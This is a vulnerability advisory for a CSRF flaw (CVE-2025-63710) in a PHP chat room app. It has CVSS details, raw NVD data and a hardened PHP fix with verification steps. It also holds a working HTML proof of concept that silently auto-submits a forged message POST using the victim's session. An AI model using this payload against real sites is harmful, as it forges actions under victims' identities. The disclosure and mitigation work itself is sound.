Security Vulnerability Report

CVE-2025-63710 CVSS 6.5 MEDIUM

Published: 2025-11-10 15:15:38
Last Modified: 2025-11-17 18:18:40

Description

The send_message.php endpoint in SourceCodester Simple Public Chat Room 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). The application does not implement any CSRF-protection mechanisms such as tokens, nonces, or same-site cookie restrictions. An attacker can create a malicious HTML page that, when visited by an authenticated user, will automatically submit a forged POST request to the vulnerable endpoint. This request will be executed with the victim's privileges, allowing the attacker to perform unauthorized actions on their behalf, such as sending arbitrary messages in any chat room.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Note on the vector: this score comes from a Secondary (non-CNA) assessment in the record below, and it rates Privileges Required and User Interaction as None. The description itself requires an authenticated victim to load an attacker-controlled page, which CVSS 3.1 normally scores as User Interaction Required (UI:R) for a CSRF; with UI:R the base score would be lower, so treat 6.5 as an upper bound rather than a precise rating. The integrity impact (forged messages posted as the victim) is the substantive finding; the Confidentiality Low rating is not explained by the description.

Configurations (Affected Products)

cpe:2.3:a:pijey:simple_public_chat_room:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Simple Public Chat Room 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-63710 -->
<!-- Target: SourceCodester Simple Public Chat Room 1.0 send_message.php -->
<!DOCTYPE html>
<html>
<head>
  <title>Chat Message</title>
</head>
<body>
  <h1>Welcome to Chat Room</h1>
  <p>Loading messages...</p>
  <!-- Hidden form whose POST carries the victim's session cookie to the target -->
  <form id="csrfForm" action="http://TARGET_HOST/simple-public-chat-room/send_message.php" method="POST" style="display:none;">
    <input type="hidden" name="message" value="[CSRF] Malicious message injected by attacker">
    <input type="hidden" name="chat_room" value="1">
  </form>
  <script>
    // Auto-submit the form when the page loads; no click is needed from the victim
    document.addEventListener('DOMContentLoaded', function() {
      console.log('Submitting message...');
      document.getElementById('csrfForm').submit();
    });
  </script>
</body>
</html>
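The PoC works because the endpoint accepts any POST that arrives with a valid session cookie. The following is an added example of a hardened send_message.php pattern, written for this page; it is not the SourceCodester project's code. It assumes the form fields `message` and `chat_room` seen in the PoC, a session-based login that stores `user_id`, and a hypothetical hidden field `csrf_token`; the hostname `APP_HOST` is a placeholder. It combines the three controls the description says are missing: a per-session token checked in constant time, a SameSite session cookie, and an Origin/Referer check as defense in depth.

```php
<?php
// Added example of a CSRF-hardened send_message.php. Not the project's code.
// Assumptions: form fields `message` and `chat_room` (from the PoC above),
// a hidden field `csrf_token` (name chosen here), and `user_id` in the session.
declare(strict_types=1);

// Compare Origin/Referer against a fixed hostname, not $_SERVER['HTTP_HOST'],
// which a client can influence on misconfigured virtual hosts.
const APP_HOST = 'chat.example.test'; // assumption: replace with the real host

// 1. Session cookie hardening. SameSite=Lax means the browser withholds the
//    cookie on cross-site POSTs, so the PoC's auto-submitted form arrives
//    unauthenticated. Requires PHP 7.3+ for the array form of this call.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,   // assumption: site is served over HTTPS
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// 2. Per-session anti-CSRF token. The page that renders the chat form calls
//    csrf_token() and embeds the value in <input type="hidden" name="csrf_token">.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; missing, empty and mismatched tokens all fail.
function csrf_token_is_valid(?string $submitted): bool
{
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// 3. Defense in depth: browsers set Origin (or Referer) and a cross-site page
//    cannot forge them. A missing header or an "Origin: null" fails closed.
function request_origin_is_trusted(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST); // null for "null" or garbage
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// ---- endpoint logic ----

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('Method Not Allowed');
}

if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit('Not logged in');
}

if (!request_origin_is_trusted($_SERVER, APP_HOST)
    || !csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('CSRF check failed');
}

$message  = trim((string) ($_POST['message'] ?? ''));
$chatRoom = filter_var($_POST['chat_room'] ?? '', FILTER_VALIDATE_INT);

if ($message === '' || $chatRoom === false) {
    http_response_code(400);
    exit('Bad request');
}

// Persist $message for $_SESSION['user_id'] in room $chatRoom with a prepared
// statement. The storage layer is the application's own and is not shown here.
```

To verify the fix, replay the PoC above against the patched endpoint: with SameSite=Lax the request should arrive without a session cookie and be rejected with 401, and a same-site request that omits or alters `csrf_token` should be rejected with 403. The token check must stay in place even with SameSite cookies, since older browsers and some cross-site GET-to-POST paths do not honor SameSite uniformly.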

References

https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63710/README2.md (Exploit, Mitigation, Third Party Advisory)
https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html (Product)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63710",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-10T15:15:37.920",
    "lastModified": "2025-11-17T18:18:39.677",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The send_message.php endpoint in SourceCodester Simple Public Chat Room 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). The application does not implement any CSRF-protection mechanisms such as tokens, nonces, or same-site cookie restrictions. An attacker can create a malicious HTML page that, when visited by an authenticated user, will automatically submit a forged POST request to the vulnerable endpoint. This request will be executed with the victim's privileges, allowing the attacker to perform unauthorized actions on their behalf, such as sending arbitrary messages in any chat room."
      },
      {
        "lang": "es",
        "value": "El endpoint send_message.php en SourceCodester Simple Public Chat Room 1.0 es vulnerable a falsificación de petición en sitios cruzados (CSRF). La aplicación no implementa ningún mecanismo de protección contra CSRF, como tokens, nonces o restricciones de cookie de mismo sitio. Un atacante puede crear una página HTML maliciosa que, cuando es visitada por un usuario autenticado, enviará automáticamente una petición POST falsificada al endpoint vulnerable. Esta petición se ejecutará con los privilegios de la víctima, permitiendo al atacante realizar acciones no autorizadas en su nombre, como enviar mensajes arbitrarios en cualquier sala de chat."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pijey:simple_public_chat_room:1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "4333F6E1-DB7B-451F-96FD-437425AFA15A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63710/README2.md",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Third Party Advisory"]
      },
      {
        "url": "https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}